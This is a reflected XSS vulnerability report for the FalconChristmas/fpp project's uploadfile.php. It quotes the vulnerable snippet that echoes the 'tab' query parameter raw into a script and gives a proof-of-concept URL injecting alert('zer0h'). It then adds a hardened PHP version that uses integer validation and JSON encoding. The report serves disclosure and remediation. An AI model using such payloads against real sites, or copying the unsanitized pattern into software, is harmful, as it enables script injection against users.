Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

Hi, in https://github.com/FalconChristmas/fpp/blob/39aa11e6f9bf8e7ee63bdbb07ea9fcabf434a60e/www/uploadfile.php#L504 you build a JS script using unsanitized user input; this can lead to XSS:

<script>
    var activeTabNumber = 
<?php
    if (isset($_GET['tab']))
        print $_GET['tab']; // XSS here: the raw query value lands inside the script
    else
        print "0";
?>;
/**/
</script>

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/uploadfile.php?&tab=1;alert(%27zer0h%27) and the JS line will be var activeTabNumber = 1;alert('zer0h');
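A hardened replacement for the snippet above, added here as an example and not taken from the FPP code base: the tab index is validated as a bounded integer before it is echoed into the script, and a separate helper shows how a string value would have to be encoded for a JavaScript context. The function names and the hypothetical label parameter are assumptions.

```php
<?php
// Added example (not FPP's own code): hardened form of the uploadfile.php
// snippet. Function names below are hypothetical.

// The tab index is only ever a small integer, so the narrowest fix is to
// validate it as one before it reaches the JavaScript context.
function safe_tab_number(array $query, int $max = 20): int
{
    if (!isset($query['tab'])) {
        return 0;
    }
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer,
    // including the "1;alert('zer0h')" value from the proof of concept,
    // so the original fallback of 0 is used instead.
    $tab = filter_var($query['tab'], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => $max]]);
    return $tab === false ? 0 : $tab;
}

// If a value genuinely has to be a string inside a <script> block, emit it
// as a JSON literal with the HEX flags so that <, >, &, ' and " are escaped
// and can neither close the script tag nor break out of the literal.
function js_literal($value): string
{
    return json_encode($value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}
?>
<script>
    var activeTabNumber = <?php echo safe_tab_number($_GET); ?>;
    // "label" is a hypothetical string parameter used only to show js_literal().
    var tabLabel = <?php echo js_literal($_GET['label'] ?? ''); ?>;
</script>
```

With the proof-of-concept URL, safe_tab_number() returns 0 and the rendered line is var activeTabNumber = 0;, so no attacker-controlled text reaches the script.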

💥 Impact

XSS